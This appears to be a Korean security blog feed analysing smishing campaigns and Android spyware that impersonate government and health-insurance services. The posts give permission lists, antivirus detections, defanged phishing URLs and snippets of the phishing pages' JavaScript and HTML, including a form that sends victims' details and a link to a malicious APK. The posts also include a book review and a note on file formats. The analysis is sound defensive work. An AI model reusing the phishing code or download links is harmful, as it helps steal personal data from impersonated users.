ZoneAlarm by Check Point : HEUR:Trojan-Dropper.AndroidOS.Badpack.e

VirusTotal 탐지 결과

Android Manifest

Activities 3 , Services 4, Receivers 5, Providers 3

aapt dump xmlstrings 정부24_13.2.1.22.apk AndroidManifest.xml

android.permission.ACCESS_NETWORK_STATE
android.permission.ACCESS_NOTIFICATION_POLICY
android.permission.ACCESS_WIFI_STATE
android.permission.BIND_DEVICE_ADMIN
android.permission.BIND_JOB_SERVICE
android.permission.BROADCAST_SMS
android.permission.BROADCAST_WAP_PUSH
android.permission.CHANGE_NETWORK_STATE
android.permission.CHANGE_WIFI_STATE
android.permission.DELETE_PACKAGES
android.permission.DEVICE_POWER
android.permission.GET_TASKS
android.permission.GET_TOP_ACTIVITY_INFO
android.permission.INTERACT_ACROSS_USERS_FULL
android.permission.INTERNET
android.permission.READ_CONTACTS
android.permission.READ_EXTERNAL_STORAGE
android.permission.READ_PHONE_STATE
android.permission.READ_SMS
android.permission.RECEIVE_BOOT_COMPLETED
android.permission.RECEIVE_MMS
android.permission.RECEIVE_SMS
android.permission.RECEIVE_WAP_PUSH
android.permission.REORDER_TASKS
android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS
android.permission.SEND_RESPOND_VIA_MESSAGE
android.permission.SEND_SMS
android.permission.SYSTEM_ALERT_WINDOW
android.permission.VIBRATE
android.permission.WAKE_LOCK
android.permission.WRITE_APN_SETTINGS
android.permission.WRITE_CONTACTS
android.permission.WRITE_EXTERNAL_STORAGE


android.provider.Telephony.SMS_DELIVER
android.provider.Telephony.SMS_RECEIVED
android.provider.Telephony.WAP_PUSH_DELIVER


com.tencent.shopcj.receiver.AlarmReceiver
com.tencent.shopcj.receiver.MSmsReceiver
com.tencent.shopcj.receiver.MainReceiver
com.tencent.shopcj.receiver.MyDeviceAdminReceiver
com.tencent.shopcj.receiver.SmsReceiver

com.tencent.shopcj.service.HeadlessSmsSendService
com.tencent.shopcj.service.MainService
com.tencent.shopcj.service.MyJobService
com.tencent.shopcj.service.RemoteService

com.tencent.shopcj.ui.AdminActivity
com.tencent.shopcj.ui.ComposeSmsActivity
com.tencent.shopcj.ui.MainActivity

Android Permission

권한	설명
ACCESS_NETWORK_STATE	네트워크에 대한 정보에 접근합니다.
ACCESS_NOTIFICATION_POLICY	알림 정책에 대한 접근을 허용합니다.
ACCESS_WIFI_STATE	Wi-Fi 네트워크에 대한 정보에 접근합니다.
BIND_DEVICE_ADMIN	응용 프로그램이 디바이스 관리자에 바인딩될 수 있게 합니다.
BIND_JOB_SERVICE	작업 서비스에 바인딩할 수 있게 합니다.
BROADCAST_SMS	받은 SMS 메시지를 방송합니다.
BROADCAST_WAP_PUSH	WAP 푸시 수신을 방송합니다.
CHANGE_NETWORK_STATE	네트워크 연결 상태를 변경합니다.
CHANGE_WIFI_STATE	Wi-Fi 연결 상태를 변경합니다.
DELETE_PACKAGES	응용 프로그램을 삭제할 수 있도록 허용합니다.
DEVICE_POWER	전원 관리에 대한 저수준 액세스를 허용합니다.
GET_TASKS	현재 또는 최근에 실행 중인 작업에 대한 정보를 검색합니다.
GET_TOP_ACTIVITY_INFO	최상위 활동에 대한 정보를 검색합니다.
INTERACT_ACROSS_USERS_FULL	사용자 간에 완전한 상호 작용을 허용합니다.
INTERNET	네트워크 소켓을 엽니다.
READ_CONTACTS	사용자의 연락처 데이터를 읽습니다.
READ_EXTERNAL_STORAGE	외부 저장소에서 읽습니다.
READ_PHONE_STATE	전화 상태를 읽습니다.
READ_SMS	SMS 메시지를 읽습니다.
RECEIVE_BOOT_COMPLETED	부팅 완료 알림을 수신합니다.
RECEIVE_MMS	MMS 메시지를 수신합니다.
RECEIVE_SMS	SMS 메시지를 수신합니다.
RECEIVE_WAP_PUSH	WAP 푸시 메시지를 수신합니다.
REORDER_TASKS	시스템 작업을 재정렬합니다.
REQUEST_IGNORE_BATTERY_OPTIMIZATIONS	애플리케이션의 배터리 최적화를 무시하도록 요청합니다.
SEND_RESPOND_VIA_MESSAGE	앱이 SMS 메시지를 전송하고 수신 메시지에 응답할 수 있게 합니다.
SEND_SMS	SMS 메시지를 전송합니다.
SYSTEM_ALERT_WINDOW	시스템 레벨 경고를 표시합니다.
VIBRATE	진동 장치를 제어합니다.
WAKE_LOCK	PowerManager WakeLocks를 사용하여 프로세서가 절전 모드로 들어가지 않도록 합니다.
WRITE_APN_SETTINGS	APN 설정을 작성할 수 있게 허용합니다.
WRITE_CONTACTS	사용자의 연락처 데이터를 작성합니다.
WRITE_EXTERNAL_STORAGE	외부 저장소의 내용을 수정하거나 삭제합니다.

코드 분석

앱 실행 시 아이콘을 은닉하고, sms 기본앱 변경, 배터리 최적화, 부팅 시 앱 실행을 수행합니다.
디바이스, 시스템, phone, 네트워크, 배터리, sms, 주소록, 갤러리, 녹음 파일, 정보를 수집 하고
su 권한 획득, 앱설치 목록, 특정 앱 설치 유무, 녹음, 통화 녹음, sms 감시, 유출지 업데이트, 수집 정보 유출 행위를 수행합니다.

아이콘 은닉
sms 기본앱 변경
배터리 최적화 및 부팅시 앱 실행
각종 정보 수집 유출
SMS 정보 수집 유출
주소록 정보 수집 유출
갤러리 폴더 정보 수집 유출
녹음 기능 파일 파일 유출
su 권한 획득
sms 송신 기능
설치된 앱 정보 수집 유출
특정 앱 설치 유무 확인 유출
전원 및 WiFi 잠금 상태
모니터링 기능
정보 유출지 확인 및 업데이트
정보 유출

1. 아이콘 은닉 기능

2. sms 기본앱 변경

3. 베터리 최적화 및 부팅시 앱 실행

베터리 최적화

부팅시 앱 실행

4. 각종 정보 수집

디바이스, 시스템, 핸드폰, 네트워크, 센서, 베터리 정보 수집

5. SMS 정보 수집 유출

6. 주소록 정보 수집 및 유출

7. 갤러리 폴더 정보 수집 유출

8. 녹음 기능 및 녹음 파일 유출

8. su 권한 획득

9. sms 송신 기능

10. 설치된 앱 정보 수집 유출

12. 특정 앱 설치 유무 확인 유출

13. 전원 및 WiFi 잠금 상태

14. 모니터링 기능

sms 수신 시 server로 sms 전송, 통화 착/발신 시 통화녹음 기능

sms 모니터링1

sms 모니터링2

전화 감시 녹음 1

전화 감시 녹음 2

15. 정보 유출지 확인 및 업데이트

기존 하드 코딩된 정보 유출지와 확인 한 유출지가 다르면 업데이트 합니다.

특정 URL 접속 해서 유출지 업데이트

앱내에 저장된 파일을 이용한 업데이트1

앱내에 저장된 파일을 이용한 업데이트2

앱내에 저장된 파일을 이용한 업데이트3

git을 이용한 유출지 업데이트

git을 이용한 유출지 업데이트2

16. 정보 유출

수집 정보를 유출하고 WebSocket으로 지속적으로 통신합니다.

검색 사이트에서 해당 회사나 기관들을 검색하시고, 검색 결과 대부분은 상위 페이지에 노출됩니다.

휴대전화 보안 그리고 악성 앱 제거 방법

https://open.kakao.com/o/sy8rOtNf

cago_note님의 오픈프로필

cago_note 블로그 운영중!

open.kakao.com

부고장 사칭 피싱 사이트(23.11.26)

카고형 — Tue, 28 Nov 2023 19:40:31 +0900

지인 관련 스미싱인 부고장 사칭 피싱 사이트입니다.

해당 스미싱 문구는 지인 사칭으로 배포되고 있습니다. 지인 사칭 스미싱 문구는 결혼식, 돌잔치, 지인 행사, 부고 관련 메세지를 포함하여 보내고 있습니다. 해당 피싱 사이트는 부고관련 메세지를 사칭 하여 스미싱 문구를 베포 합니다.

정상적인 부고 메세지는 요세는 일반적으로 대부분 상주이름, 일시, 발인 일시, 장소가 문자에 포함 되는데 부고관련 사칭 스미싱은 해당 정보가 기입이 안되어 있는게 확인 됩니다.

모르는 번호로 전화가 왔을때는 항상 꼼꼼히 확인 하시셔서 피해 없으시길 바랍니다.

문구)

"아버님께서 금일아침에 별세하셨기에 삼가 알려드립니다.. 장례식장주소http://URL"

피싱 사이트 접속 화면

해당 피싱 사이트는 접속후 클릭을 하게 되면 apk 파일이 다운하게 됩니다.

스미싱 문구에는 장소가 포함되지 않았기 때문에 피싱 페이지에서 열기 버튼을 누르면 확인 할 수 있는 것처럼 접속한 사용자가 클릭하게 끔 유도 하는 형태로 보입니다.

부고장 사칭 피싱 사이트

HTML 분석

해당 페이지는 부고장 이미지를 보여주고, 클릭 시 악성앱을 다운로드 하게 됩니다.

html 소스

	function downAlert(){
		alert("장례식장 장소와 시간을 보기위하여 확인을눌러주세요.");
		window.open("down.php");
	}
    var $main = $('.preview-main');
    var css_obj = $main.data('css');
    $main.css('background-color', css_obj.backgroundColor);

    $('.J_prev').on('click', ()=>{
        tabPage(1)
    });
    $('.J_next').on('click', ()=>{
        tabPage(-1)
    });
    var wrapper = document.getElementById('wrapper');
    function tabPage(is_up) {
        wrapper.contentWindow.postMessage(is_up, '*');
    }

이미지를 클릭 하면 "장례식장 장소와 시간을 보기위하여 확인눌러주세요." 창이 뜨고, down.php 페이지로 넘어가게 됩니다.

클리시 창화면을 보여줌

down.php

down.php 페이지에서는 get 요청을 보내 "cloudflare"라는 클라우드 서버에 접속하여 최종적으로 악성앱을 다운 하게 됩니다.

apk파일 다운

해당 스미싱 문자에 포함된 URL을 누르게되면 부고장 피싱 사이트로 접속 하게 되며, 페이지에 있는 이미지 클릭시 특정 페이지로 넘어가게 되며, 최종적으로는 APK파일을 다운 받게 됩니다. 해당 APK 파일은 악성 앱입니다.

VirusTotal 백신 탐지 결과

Avira (no cloud) : ANDROID/Malformed.ZIP.Gen
BitDefenderFalx : Android.Trojan.AgentSpy.DT
Cynet : Malicious (score: 99)
DrWeb : Android.Packed.15.origin
ESET-NOD32 : A Variant Of Android/TrojanDropper.Agent.LKS
F-Secure : Malware.ANDROID/Malformed.ZIP.Gen
Fortinet : Android/Agent.LKS!tr
Ikarus : Trojan-Dropper.AndroidOS.Agent
Kaspersky : HEUR:Trojan-Dropper.AndroidOS.Badpack.e
ZoneAlarm by Check Point : HEUR:Trojan-Dropper.AndroidOS.Badpack.e

검색 사이트에서 해당 회사나 기관들을 검색하시고, 검색 결과 대부분은 상위 페이지에 노출됩니다.

휴대전화 보안 그리고 악성 앱 제거 방법

정부24(구 민원24) 사칭 스미싱 피싱 사이트(23.11.09)

카고형 — Fri, 10 Nov 2023 17:53:13 +0900

관공서 사칭 스미싱인 정부24 피싱 사이트입니다.

정부24(구 민원24) 에서 과태료, 범칙금 등으로 배포되고 있는데 "교통민원24" 스미싱 문구와 비슷하게 범법 행위를 직접적으로 언급하여 문자를 보낼 것으로 추정됩니다.

스미싱 문구

[민원24]쓰레기 무단투기로 단속되어 과태료 부과되였습니다. 과태료확인: URL

사진 출처 : 목포시

목포시에서 "관공서 사칭 문자 스미싱 피해 주의"라는 보도 자료를 참고하여 작성했습니다.

https://www.mokpo.go.kr/www/open_administration/city_news/notice?idx=520408&mode=view

지역여건

목포시청 목포시 대표 누리집 www.mokpo.go.kr

152.99.135.118

정상 배포 방식

정부에서 앱 다운로드 하는 경우는 특이사항이 아닌 이상 요구 하지 않을 것으로 생각됩니다.

※ 정상 배포방식은 원스토어, 구글플래이 해당 사이트(어플)를 통해서만 배포합니다.

피싱 사이트 접속 화면

해당 피싱 사이트는 번호 입력 - 본인인증 - 앱 다운 순으로 진행됩니다.

해당 피싱 사이트는 사칭 사이트인 정부24 홈페이지와 번호 입력 부분 빼고는 거의 비슷 하게 생겼기 때문에 홈페이지만 보고 판단 하기에는 일반 사용장 입장에서는 구분이 어려울 것으로 생각 됩니다.

피싱 사이트 순서

악성 앱 다운

피싱 사이트 정보 유출

번호 입력

번호 입력 유출

입력한 번호가 피싱 사이트 서버로 전송 되는 것을 확인할 수 있습니다.

간편 인증 페이지

간편 인증 정보 유출

간편 인증 페이지에서는 입력한 이름, 주민번호, 통신사, 번호 가 유출 되는것을 확인 할 수 있습니다.

피싱 사이트 URL

www.goosmsi[.]com/6jIfin
https://www.seoulnsk[.]live/
https://www.seoulnsk[.]live/index/in?tel=
https://www.seoulnsk[.]live/index/down?tel=
https://www.seoulnsk[.]live/index/down-app?tel=

해당 스미싱 문자에 포함된 URL 주소로 접속하면 정부24(구 민원24) 사칭 피싱 사이트로 접속하게 되며, 사용자에게 개인정보 요구 및 수집을 합니다. 마지막 페이지에서 설치하기 버튼을 클릭하면 APK 파일을 설치하게 되며, 해당 앱은 악성 앱입니다.

VirusTotal 탐지 결과

검색 사이트에서 해당 회사나 기관들을 검색하시고, 검색 결과 대부분은 상위 페이지에 노출됩니다.

휴대전화 보안 그리고 악성 앱 제거 방법

pobfs to dex 이름 바꾸기

카고형 — Tue, 7 Nov 2023 13:42:28 +0900

요즘 apk 악성앱 분석시 내부 폴더에 pobfs 확장자를 가진 dex파일을 만드는데 dex파일이 40개 씩 나오는 경우도 있어서 간단하게 파일 이름 바꾸는거 만들어봄

pobfstodex.zip

5.49MB

비번 : cago

사용방법

위에 파일을 다운 받고 pobfs 파일 경로에 exe 파일을 실행 시키면 됨

pobfs to dex 이름 바꾸기 1

pobfs to dex 이름 바꾸기 2

MT Manager를 이용해서 바뀐 dex를 한번에 파일 넣는 방법

1. MT Manager 에서 설정을 Select all 를 선택 한다

MT Mannager dex 넣기 1

2. 선택한 classes.dex 파일 Add를 눌러서 해당 apk 파일쪽으로 dex 파일을 옮긴다.

MT Mannager dex 넣기 2

MT Mannager dex 넣기 3

MT Mannager dex 넣기 4

[악성 앱] 국민건강보험 사칭 스미싱 악성앱 분석 (23.11.01)

카고형 — Sun, 5 Nov 2023 21:16:41 +0900

공공기관 사칭 스미싱인 국민건강보험 피싱 사이트입니다. URL 클릭 금지..

해당 스미싱은 건강검사 통지서 관련으로 국민건강보험 공단에서 보낸 것처럼 건강검진 안내 문구를 사칭해 스미싱 문자를 보내는 형태이다. 기존에 스미싱 문자는 건강보험, 건강검사, 건강검진, 통지서, 통보문, 통보서 등 이러한 문구가 포함된 문자를 보냈는데 이번 문자에서는 [The국민보험] 이란 키워드가 추가된 것을 확인할 수 있다. 이전과 같은 형태로 스미싱 문자를 통해 URL 클릭을 유도하여, 피싱 사이트에 접속하고 악성 앱을 다운로드시키는 방법을 이용한다.

기존에는 피싱 사이트 접속시 번호 입력 - 개인정보 입력 - 다운로드 버튼 페이지 형태였지만 현재는 피싱 사이트에서 바로 다운로드 버튼이 보이는 방법으로 바뀌었다.

스미싱 문구

[Web발신]

[The국민보험]

건강검사 통보서 전송완료, 내용확인 https://s12.a1hy[.]info

건강검진 스미싱 문자

정상 배포 방식

건강보험 앱

※ 정상 배포방식은 원스토어, 구글플래이 해당 사이트(어플)를 통해서만 배포합니다.

피싱 사이트 접속 화면

피싱 사이트 URL 주소

https://s12[.]a1hy.info/ (피싱 페이지)
https://s12[.]a1hy.info/download/the.apk (다운로드 apk 주소)

스미싱 문자에 포함된 URL 주소로 접속하면 '국민건강보험' 사칭 피싱 사이트 페이지로 접속된다. 해당 페이지에서는 "검진통지서 받기"라는 버튼이 보이고, 해당 버튼을 클릭하게 되면 APK 파일을 다운로드하게 된다. 다운로드한 APK 파일은 악성앱으로 확인된다.

APK 파일 정보

App Name : 국민건강보험.apk
package : kqukkj.eeohspkk.fhxoit
MD5 : C045B3B0CBAB88EC156E837B9876E1A7
SHA-1 : 6CFB4B1CFE71668535CA35D1E11D31973C389370

Virustotal에 해쉬 검색시 7개에 백신에서 탐지 된것을 확인 할 수 있다.

Avira (no cloud) : ANDROID/Malformed.ZIP.Gen
Cynet : Malicious (score: 99)
DrWeb : Android.Packed.13.origin
F-Secure : Malware.ANDROID/Malformed.ZIP.Gen
Ikarus : Trojan-Dropper.AndroidOS.Agent
Kaspersky : HEUR:Trojan-Spy.AndroidOS.FakeApp.q
ZoneAlarm by Check Point : HEUR:Trojan-Spy.AndroidOS.FakeApp.q

Android Manifest

Activities , Services , Receivers , Providers

Package [kqukkj.eeohspkk.fhxoit] (b0fccb5):
    userId=10055
    pkg=Package{7e5cfd8 kqukkj.eeohspkk.fhxoit}
    codePath=/data/app/kqukkj.eeohspkk.fhxoit-Jbi_RTeeumldEjdFXfQmUA==
    resourcePath=/data/app/kqukkj.eeohspkk.fhxoit-Jbi_RTeeumldEjdFXfQmUA==
    legacyNativeLibraryDir=/data/app/kqukkj.eeohspkk.fhxoit-Jbi_RTeeumldEjdFXfQmUA==/lib
    primaryCpuAbi=null
    secondaryCpuAbi=null
    versionCode=207 minSdk=21 targetSdk=33
    versionName=1.0.2
    splits=[base]
    apkSigningVersion=2
    applicationInfo=ApplicationInfo{305eebb kqukkj.eeohspkk.fhxoit}
    flags=[ HAS_CODE ALLOW_CLEAR_USER_DATA ]
    privateFlags=[ PRIVATE_FLAG_ACTIVITIES_RESIZE_MODE_RESIZEABLE_VIA_SDK_VERSION ]
    dataDir=/data/user/0/kqukkj.eeohspkk.fhxoit
    supportsScreens=[small, medium, large, xlarge, resizeable, anyDensity]
    timeStamp=2023-11-05 20:10:03
    firstInstallTime=2023-11-05 20:10:04
    lastUpdateTime=2023-11-05 20:10:04
    installerPackageName=com.android.packageinstaller
    signatures=PackageSignatures{b3d7f31 version:2, signatures:[275b133c], past signatures:[]}
    installPermissionsFixed=true
    pkgFlags=[ HAS_CODE ALLOW_CLEAR_USER_DATA ]
    declared permissions:
      com.lmhy.gameplane.DYNAMIC_RECEIVER_NOT_EXPORTED_PERMISSION: prot=signature, INSTALLED
    requested permissions:
      android.permission.INTERNET
      android.permission.ACCESS_NETWORK_STATE
      android.permission.READ_PRIVILEGED_PHONE_STATE
      android.permission.READ_SMS
      android.permission.RECEIVE_SMS
      android.permission.RECEIVE_MMS
      android.permission.SEND_SMS
      android.permission.READ_PHONE_STATE
      android.permission.READ_PHONE_NUMBERS
      android.permission.VIBRATE
      com.lmhy.gameplane.DYNAMIC_RECEIVER_NOT_EXPORTED_PERMISSION
    install permissions:
      android.permission.INTERNET: granted=true
      android.permission.ACCESS_NETWORK_STATE: granted=true
      android.permission.VIBRATE: granted=true
      com.lmhy.gameplane.DYNAMIC_RECEIVER_NOT_EXPORTED_PERMISSION: granted=true
    User 0: ceDataInode=5832759 installed=true hidden=false suspended=false stopped=false notLaunched=false enabled=0 instant=false virtual=false
      lastDisabledCaller: com.android.packageinstaller
      gids=[3003]
      runtime permissions:
        android.permission.READ_SMS: granted=true
        android.permission.READ_PHONE_NUMBERS: granted=true
        android.permission.RECEIVE_MMS: granted=true
        android.permission.RECEIVE_SMS: granted=true
        android.permission.READ_PHONE_STATE: granted=true
        android.permission.SEND_SMS: granted=true

Android Permission

권한	설명
android.permission.INTERNET	인터넷에 액세스할 수 있는 권한.
android.permission.ACCESS_NETWORK_STATE	네트워크 연결 상태 및 유형에 액세스할 수 있는 권한.
android.permission.READ_PRIVILEGED_PHONE_STATE	특권된 휴대폰 상태 정보에 대한 읽기 액세스 권한.
android.permission.READ_SMS	SMS 메시지를 읽을 수 있는 권한.
android.permission.RECEIVE_SMS	SMS 메시지를 수신하고 처리할 수 있는 권한.
android.permission.RECEIVE_MMS	MMS(Multimedia Messaging Service) 메시지를 수신하고 처리할 수 있는 권한.
android.permission.SEND_SMS	SMS 메시지를 전송할 수 있는 권한.
android.permission.READ_PHONE_STATE	휴대폰 상태 및 신호 정보에 읽기 액세스 권한.
android.permission.READ_PHONE_NUMBERS	휴대폰 번호에 읽기 액세스 권한.
android.permission.VIBRATE	기기 진동을 제어할 수 있는 권한.

코드 분석

해당 앱은 각종 기기정보, 개인정보, sms 정보 수집을 하고, 수집된 정보를 특정 C&C 서버 주소로 유출 행위를 한다. 또한 사용자를 속이기 위해 정상 사이트를 보여준다.

Web View(정상 사이트)
각종 정보 수집
sms 정보수집 및 진동 제어
정보 유출

1. 앱 실행 시 정상 사이트를 보여줌

정상 사이트 "www.nhis.or.kr" 페이지의 화면을 보여주며 정상 앱인것 처럼 사용자를 속인다.

2. 각종 정보 수집

핸드폰번호, sim 번호, IMEI 번호, 통신사 정보 수집

3. SMS 수신시 정보 유출 및 진동 제어

4. 유출지 (C&C)정보

5. 정보 유출 형태

해당 앱은 핸드폰 기기정보, 개인정보, 통신사 정보등이 유출됩니다. 기기정보 같은 경우는 sim 스와핑으로 sim 복제 가능성도 있구요, 개인정보 탈취와 문자 정보 탈취로 인해 악의적으로 사용자 인증 하여 추가 행위를 할 수 있습니다.

휴대전화 보안 그리고 악성 앱 제거 방법

https://open.kakao.com/o/sy8rOtNf

cago_note님의 오픈프로필

cago_note 블로그 운영중!

open.kakao.com

국민건강보험 사칭 피싱 사이트 (23.11.01)

카고형 — Wed, 1 Nov 2023 18:58:02 +0900

공공기관 사칭 스미싱인 국민건강보험 피싱 사이트입니다. URL 클릭 금지..

스미싱 문구

[Web발신]

[The국민보험]

건강검사 통보서 전송완료, 내용확인 https://s12.a1hy[.]info

정상 배포 방식

건강보험 앱

※ 정상 배포방식은 원스토어, 구글플래이 해당 사이트(어플)를 통해서만 배포합니다.

피싱 사이트 접속 화면

국민건강보험 피싱 사이트

피싱 사이트 URL 주소

https://s12[.]a1hy.info/ (피싱 페이지)
https://s12[.]a1hy.info/download/the.apk (다운로드 apk 주소)

VirusTotal 탐지 결과

요즘은 후후나 스팸 차단 서비스가 있지만 번호로 판단하는 것은 위험합니다. 아래 기사와 같이 해커가 악의적으로 정상 회사 번호를 이용하여 스미싱이나 스팸 문자를 배포를 하기 때문에 정상 번호로 왔다고 해서 믿으면 안 됩니다.
아래는 쇼핑몰 회사 번호에서 교통민원24, 벌금, 범칙금등에 내용을 보내서 판단하기 어렵지 않지만, 택배 관련 스미싱 문자가 올 수 있기 때문에 항상 주의하셔야 합니다.

https://m.boannews.com/html/detail.html?idx=123237

STCO, 고객센터 번호로 발송된 스미싱 문자 사과... 고객정보 유출은 확인 안돼

남성 패션 코디네이션 브랜드 STCO(에스티코)를 운영하는 STO(대표 김흥수)가 홈페이지 공지를 통해 ‘스미싱 문자 발송에 대한 안내 및 사과문’을 올렸다.

m.boannews.com

휴대전화 보안 그리고 악성 앱 제거 방법

[책 읽기] 인간관계론 리뷰

카고형 — Mon, 2 Oct 2023 13:21:51 +0900

데일 카네기 인간관계론

사람들을 설득하는 12가지 방법

1. 논쟁을 이기는 유일한 방법은 논쟁을 피하는 방법이다.

2. 다른사람의 의견을 존중하라 절대로 그사람이 틀렸다고 하지마라

3. 당신이 틀렸다면 빨리 분명히 인정하라

4 우호적으로 시작 하라

5. 다른 사람들오 하여금 당장 네네 말하게 하라

6.  말을 많이 하게 만들어라

7. 다른사람이 하여금 스스로 생각했다고 여기도록 만들어라

8. 진심으로 다른사람 관점에서 사물을 보려 애써라

9. 다른사람에 생각과 욕망에 공감 하라

10. 고상한동기에 호소 하라

11. 생각 극화 하기

12. 도전 의욕을 불러 이르켜라

음 읽으면서 재밌었다고 느끼고 한번 시도해 볼 만한 상황이 있었는데 '중요한 사람 대접하기'였나?
어머니가 지병때문에 운동을 해야 하는데 맨날 안 하는 상황이었고, 같이 하려고 해도 말할 때마다 도망치 셨는데, 말을 할 때 엄마는 '우리한테 중요 한 사람이니까~' 하면서 하니까 조금씩 운동을 하시고 있고 언제까지 효과를 볼지 모르지만 최근에는 오늘 만보 걸었다고 자랑도 하시는 거 보니 확실히 효가는 있는 거 같은 거 같다.

책을 읽으면서는 음... 내용을 보다 보니 개인과 개인 관계에서는 한 번쯤 시도해 볼 만한 방법도 많은 거 같긴 한데.. 지속가능한 방법인지는 잘 모르겠다..

내 상황에서 할 수있는 방법이 있나? 바꾸거나 시도해볼 만 게 있나? 찾아보긴 했는데
'도전 의욕을 불러 이르켜라' 이것도 해볼만 한거 같기도...?

[문서 파일] CFBF와 OOXML

카고형 — Thu, 21 Sep 2023 22:11:39 +0900

CFBF (Compound File Binary Format)

CFBF는 바이너리 파일 형식으로, 주로 이전 버전의 마이크로소프트 오피스 문서와 한글 문서(예: .doc, .xls, .ppt, hwp)에 사용됩니다. 이 형식은 여러 부분으로 나누어진 복합 문서를 저장하기 위한 것이며, 파일 내부에 OLE (Object Linking and Embedding) 개체를 포함할 수 있습니다. CFBF는 파일 시스템과 비슷한 구조를 가지며, 섹터로 구분된 데이터 스트림을 사용하여 데이터를 저장합니다.

OLE 파일 시그니처

OLE 파일 시그니처는 D0 CF 입니다.

스트림 확인은 OLEdmp 라이브러리 이용하여 확인 하면됩니다. - OLEdmp에서 읽을수 없으면 대부분 OOXML 이라고 생각 하면됨

OLEdmp는 OLETools라고 알려진 일련의 오픈 소스 도구 중 하나입니다. 주로 OLE (Object Linking and Embedding) 구조와 관련된 파일 형식을 분석하고, 해당 파일 내부의 객체와 데이터를 추출하는 데 사용됩니다. OLE는 주로 마이크로소프트의 파일 형식 중 하나인 COM 구조와 함께 사용되며, 주로 문서와 같은 리소스를 다른 문서나 응용 프로그램에 삽입하거나 연결하는 데 사용됩니다.

OLE 파일 분석: OLEdmp는 주로 OLE 파일 형식을 분석하는 데 사용됩니다. 이 형식은 주로 마이크로소프트의 Office 문서 와 한글 문서 (ex:.doc, .xls, .ppt, .hwp)와 관련이 있습니다.

객체 및 데이터 추출: 이 도구는 OLE 파일 내부의 객체와 데이터를 추출하는 데 사용됩니다. 이로써 OLE 파일에 포함된 객체를 개별적으로 살펴보거나 복구할 수 있습니다.

디버깅 및 보안 분석: OLEdmp는 악성 문서나 악성 코드를 분석할 때 사용하는 도구입니다. OLE 파일에서 악성 행위나 취약점을 찾는 데 도움을 줄 수 있습니다.

OOXML (Office Open XML)

OOXML은 마이크로소프트 오피스 2007 버전 이상의 파일 형식에 사용됩니다. 이 형식은 개방형 표준으로, 문서, 스프레드시트 및 프레젠테이션을 저장하는 데 사용됩니다. OOXML 문서는 일반적으로 .docx (Word), .xlsx (Excel), .pptx (PowerPoint) hwpx등의 확장자로 알려져 있습니다. OOXML 파일은 일반적으로 ZIP 압축을 사용하며 XML 기반의 표준 구조를 갖고 있습니다.

OOXML 시그니처

OOXML 시그니처는 50 4B 03 04 14 00 06 00 입니다.

분석시 zip/unzip을 이용해서 보면 됩니다.

hwp 파일 포맷 : https://www.hancom.com/etc/hwpDownload.do

글로벌 소프트웨어의 리더, 한글과컴퓨터

OWPML 파일 형식 공개 한글과컴퓨터는 2010년 6월 29일 자사의 바이너리 포맷인 HWP와 마크업 언어인 HWPML을 공개하였습니다. 이전 버전인 HWP 2.x/3.x와 HWP 2002부터 시작하여 HWP 2014, HWP 2018까지 사용하

www.hancom.com

경찰청교통민원24 사칭 스미싱 피싱 사이트 (23.09.11)

카고형 — Mon, 11 Sep 2023 01:07:32 +0900

항상 URL 링크 클릭 조심 합시다!

해당 스미싱은 경찰청 교통민원24(이파인) 사칭으로 자주 나오는 스미싱입니다. 문자(SMS)로 교통위반으로 범칙금, 벌점, 고지서, 통보서, 처벌 결과등 발송됐다며 문자 메시지가 온다. 최근 문자도 끼어들기, 전조등, 과속, 신호등 등 운전자들이 자주 실수 할 수 있는 범법 행위를 직접적으로 언급 하는 문자를 포함해서 보내는 거 같다.

해당 문구는 아래와 같이 "끼어들기 금지 위반 처벌 결과 전송 완료" 내용과 같이 확인하라는 URL을 같이 보낸다.

교통민원24 사칭 스미싱

스미싱 문구)
[Web발신] [교통민원24] 끼어들기 금지 위반 : 처벌 결과 전송 완료 http://fiolpv[.]ndrzl[.]monster:6013

피싱 메인 페이지

해당 스미싱에 있는 주소를 접속하게 되면 경찰청 교통민원24 사칭 피싱 사이트에 접속하게 됩니다.

피싱사이트 접속 화면

아래는 실제 교통민원 24 사이트입니다.

https://www.efine.go.kr/main/main.do

경찰청교통민원24(이파인)

www.efine.go.kr

교통민원24&nbsp; 로그인

교통민원 사이트에서 인증 절차는 모바일에서 인증 못 하게 만들었습니다.

HTML 분석

접속 시 개인정보를 요구하는 화면이 나오고 개인정보를 입력하게 되면 입력한 정보가 공격자 서버로 넘어가면서 다음 페이지에 접속하는 형태입니다. 최종적으로는 악성앱을 다운로드 페이지로 넘어가 악성 앱을 다운로드하게 합니다.

번호 검증

유출 정보1

리다이렉트 페이지

function select_gift()
{
	var f = document.event;
	if ( f.mobile_no1.value == "") 
	{ 
		alert("실명 입력이 필요 합니다.");
		f.mobile_no1.focus();
		return;
	}
	if (f.mobile_no2.value.length < 6) { 
		alert("생년월일을 정화하게 입력하세요.");
		f.mobile_no2.focus();
		return;
	}
	if(!checknum(f.mobile_no2.value))
	{
		alert("휴대폰번호에 숫자를 입력하세요.");
		f.mobile_no2.value="";
		f.mobile_no2.focus();
		return;
	}
	f.method = "POST";
	f.action = "82dfb4ee0abbdc8f706f3e9cea65e8df129fa7f6/";
	f.submit();
}

유출 정보2

<tr>
    <td height="35" align="center"><a href="http://fiolpv[.]ndrzl[.]monster:6013/82dfb4ee0abbdc8f706f3e9cea65e8df129fa7f6/01000000000.apk" style="color:#FFFFFF; text-decoration:none; font-size:18px; color:#000000; padding:10px 3px; display:block; background-color:#FFFFFF;"><strong>다운로드 하기</strong></a></td>
</tr>

악성앱 다운

해당 사이트 접속 후 요구하는 전화번호, 이름, 생년월일을 입력하면 입력한 값이 넘어가는 것을 확인할 수 있습니다.

별거 아닌 정보가 넘어간다고 생각할 수 있지만 이 정보를 가지고 어떤 걸 할지는 모르는 게 제일 무서운 거 같아요... 해당 정보를 판매나 추후에 악용할 여지가 있기 때문에 개인정보는 신뢰할 수 있는 사이트에서만 입력하는 게 좋습니다.

휴대전화 보안 그리고 악성 앱 제거 방법

[악성 앱] 국민건강보험 사칭 스미싱 악성앱 분석 (23.09.04)

카고형 — Mon, 4 Sep 2023 07:41:29 +0900

이번에는 공공기관 사칭 국민건강보험 스미싱에서 다운되는 "인터넷.apk" 분석 보고서 입니다.

URL 클릭 금지..

